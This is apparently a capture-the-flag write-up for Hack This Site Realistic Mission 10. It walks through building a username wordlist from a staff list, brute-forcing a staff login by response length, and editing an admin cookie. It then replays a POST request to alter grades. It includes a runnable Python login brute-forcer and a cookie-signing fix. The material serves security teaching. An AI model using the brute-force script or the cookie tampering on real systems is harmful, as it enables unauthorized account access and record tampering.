Oh hello, fancy seeing you here. Today we’re looking at Hack This Site Realistic Web Mission 10. In other words, we’re going to demonstrate how not to implement authentication and authorization mechanisms. Overall, this mission was a lot of fun. It required creating a wordlist from a list of publicly listed teachers. Then, we used that wordlist to brute force the login page to gain access to the staff control panel. Once logged in, we had to flag ourselves as an admin by modifying our cookies. Then, we modified a POST request to change the grades. If you haven’t seen my other posts on the realistic series you can do so here: Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7 and Part 8.
Poor Zach Sanchez is having a difficult time at school. In fact, he may not be able to graduate because his grades are too poor. As a result, he has messaged us to ask whether we could hack into his school’s online grade database and change his grades. Additionally, he has provided us with his username and password to allow us to explore the application.
Exploring The Web Application
The application is fairly basic: it has three links at the top and one halfway down the page. As can be seen from the image below, there isn’t a lot of functionality. For instance, the home button returns you to the home page, the staff listing takes you to a list of users, and the student access system takes you to a login page.
If we click on the Student Access System we are presented with a login page that requests a username and password. Zach provided us with his login credentials so let’s test them out and see what it gives us access to.
Upon logging in as Zach, we don’t get a lot of increased functionality. As seen from the image below, we can view his classes, his grades, and any comments left by the teacher. There is nothing here that lets us change his grades.
If we head back to the homepage and view the page source of the application, there is a reference to a page that isn’t displayed on the home page. Notably, this page is named staff.php which indicates that it could be a page that staff members use to log in. Perhaps we can use this page to access and change Zach’s grades.
Web Application Brute Force
When visiting the staff.php page we’re presented with a login form. While we have a login page, we don’t have any credentials to use to log in. I’ve explored the application in detail and couldn’t find any additional information.
However, we do have a list of staff members on the teacher listing page. With this in mind, perhaps we could use this list to identify genuine users of the application. First, I copied each user’s first and last name into a text file and saved it as usernames.txt.
Next, I cloned the username-anarchy repository from GitHub. As soon as the repository was downloaded I told it to generate a wordlist using the first name and last name, first initial and last name, and a few other combinations. I then saved the results.
Josephs-MacBook-Pro:username-anarchy Joe$ sudo ./username-anarchy --input-file /Users/Joe/Desktop/usernames.txt --select-format first,first.last,f.last,flast
adam
adam.smith
a.smith
asmith
alfred
alfred.johnson
a.johnson
ajohnson
corey
corey.beelke
c.beelke
cbeelke
edward
edward.anderson
e.anderson
eanderson
gordon
gordon.freeman
g.freeman
gfreeman
henry
henry.mathison
h.mathison
hmathison
I then refreshed the login page to capture the log-in request with Burp Suite. Once the request was captured, I sent it to the intruder tool. I then removed the automatically generated payload positions and highlighted the username and password parameter values and added the payload positions.
Launching The Attack
I selected the attack type, then pasted in the values from the wordlist in positions 1 and 2 on the payloads tab. With the attack ready, I clicked the launch attack button.
After waiting around for a while, we found the correct username and password combination. As you can see from the image below, the response length from the application is different when the correct credentials are submitted. When incorrect credentials are submitted the response lengths are all the same (1876), because the server returns the same failure page for every bad attempt. When the correct credentials are submitted, the server returns a different page (the staff area rather than the login error), so the response length stands out from the baseline. Sorting the Intruder results by length makes the one successful pair easy to spot.
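The two steps above, generating username candidates from a staff listing and then spotting a successful login by its response length, in one script. This is an added example, not code from the mission or from username-anarchy. To keep it runnable offline, the HTTP transport is an injectable callable and a constructed fake stand-in for staff.php replaces the real server; the staff names, the valid account (smiller / samantha) and the failure page are all made up for the example.

```python
"""Username wordlist generation plus length-differential login brute force.

Added example, not the mission's code. Network I/O is an injectable `send`
callable so the logic can be tested against a constructed fake server.
"""
import itertools
from typing import Callable, Iterable, List, Optional, Tuple

# Constructed input: a "First Last" staff listing like the teacher page.
STAFF_NAMES = ["Adam Smith", "Alfred Johnson", "Samantha Miller"]


def candidate_usernames(full_names: Iterable[str]) -> List[str]:
    """Mimic username-anarchy's first, first.last, f.last and flast formats."""
    out: List[str] = []
    for name in full_names:
        parts = name.lower().split()
        if len(parts) < 2:
            continue
        first, last = parts[0], parts[-1]
        for cand in (first, f"{first}.{last}", f"{first[0]}.{last}", f"{first[0]}{last}"):
            if cand not in out:
                out.append(cand)
    return out


# A transport takes (username, password) and returns the response body.
Sender = Callable[[str, str], str]


def brute_force_by_length(send: Sender, usernames: List[str],
                          passwords: List[str]) -> Optional[Tuple[str, str]]:
    """Try every username/password pair (Intruder's cluster-bomb behaviour).

    The baseline is the body length of a deliberately bogus attempt, like the
    constant 1876-byte failure page seen in Burp. The first pair whose
    response length differs from that baseline is reported as a hit.
    """
    baseline = len(send("no-such-user-zz", "no-such-pass-zz"))
    for user, pw in itertools.product(usernames, passwords):
        if len(send(user, pw)) != baseline:
            return user, pw
    return None


# Constructed fake staff.php: same error page for every failure, a different
# page for the one valid account. Assumption for the example only.
FAILURE_PAGE = "<html><body><h1>Staff Login</h1><p>Invalid username or password.</p></body></html>"
PANEL_PAGE = "<html><body><h1>Staff control panel</h1><a href='grades.php'>Grades</a></body></html>"


def fake_staff_login(username: str, password: str) -> str:
    if username == "smiller" and password == "samantha":
        return PANEL_PAGE
    return FAILURE_PAGE


if __name__ == "__main__":
    words = candidate_usernames(STAFF_NAMES)
    # Same list in both positions, as the post did with Intruder.
    print(brute_force_by_length(fake_staff_login, words, words))
```

The length check is only reliable when the failure page is byte-for-byte constant; if it embeds a CSRF token or timestamp, compare on a stable marker (the error string, a redirect status) instead of raw length. Against a real target the `send` callable would wrap an HTTP POST to staff.php.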
With the correct credentials, we can now log in to the staff area as Samantha Miller. This area of the application appears to give us some more functionality but unfortunately, our access to it is restricted as we’re not an administrator.
In order to elevate our privileges to that of an administrator, we need to inspect the page and look at our cookies. The application stores the admin flag in a cookie that the client controls and trusts its value as-is. We could intercept each request with Burp and change the cookie every time, but editing it once in the browser’s developer tools persists across requests and is far less work. The image below illustrates changing the value of the admin cookie from a 0 to a 1.
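Why flipping that cookie works, and one way the server could have prevented it. This is an added example, not the mission’s own PHP: the first function is the pattern the mission exploits (authorization read straight from a client-controlled cookie), the second makes the flag tamper-evident with an HMAC so that rewriting admin=0 to admin=1 invalidates the signature. The secret key, cookie names and payload format are assumptions for the example.

```python
"""Client-trusted admin flag versus an integrity-protected one.

Added example, not the mission's code. Key and cookie layout are assumptions.
"""
import base64
import hashlib
import hmac
from typing import Dict

SECRET_KEY = b"example-key-do-not-reuse"  # assumption: held server-side only


def is_admin_vulnerable(cookies: Dict[str, str]) -> bool:
    """The pattern the mission exploits: trust the cookie value as-is."""
    return cookies.get("admin") == "1"


def _sign(payload: str) -> str:
    mac = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).digest()
    return base64.urlsafe_b64encode(mac).decode().rstrip("=")


def issue_session_cookie(username: str, admin: bool) -> str:
    """Server issues 'user=...;admin=0|<hmac>' after a successful login."""
    payload = f"user={username};admin={int(admin)}"
    return f"{payload}|{_sign(payload)}"


def is_admin_hardened(cookies: Dict[str, str]) -> bool:
    """Accept the admin flag only if the signature over the payload verifies."""
    raw = cookies.get("session", "")
    payload, sep, sig = raw.rpartition("|")
    if not sep or not hmac.compare_digest(sig, _sign(payload)):
        return False  # unsigned or tampered: treat as not admin
    fields = dict(kv.split("=", 1) for kv in payload.split(";") if "=" in kv)
    return fields.get("admin") == "1"


def tamper_admin_flag(cookie: str) -> str:
    """What the attacker does in the browser: edit the flag, not the signature."""
    return cookie.replace("admin=0", "admin=1")


if __name__ == "__main__":
    staff_cookie = issue_session_cookie("smiller", admin=False)
    print("vulnerable, edited cookie:", is_admin_vulnerable({"admin": "1"}))
    print("hardened, edited cookie:  ", is_admin_hardened({"session": tamper_admin_flag(staff_cookie)}))
```

Signing only buys integrity; the cleaner design keeps the role on the server, keyed by an opaque random session ID, so the client never sees an admin field at all. Either way the fix is the same in spirit: authorization decisions must not depend on a value the browser can rewrite.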
Now that we have administrator privileges we can access the change grades option. Unfortunately, it is too late to change the grades through the interface as they are about to be mailed out. However, if we view the source code of the application we can see that there is still a form that submits a POST request to the change grades function.
If we copy the POST request and modify it slightly, we can send it to Burp Repeater and use it to change the grades. The snippet of code below shows the post request with the values that need to be modified highlighted in bold. Change the grade value to 5 and then change the rec value to 0 and send the request, then increase the rec value by 1 and send the request again.
You can keep modifying and sending the request until the response changes from grade submitted to the congratulations message for completing the mission.
And with that, you should have completed the mission.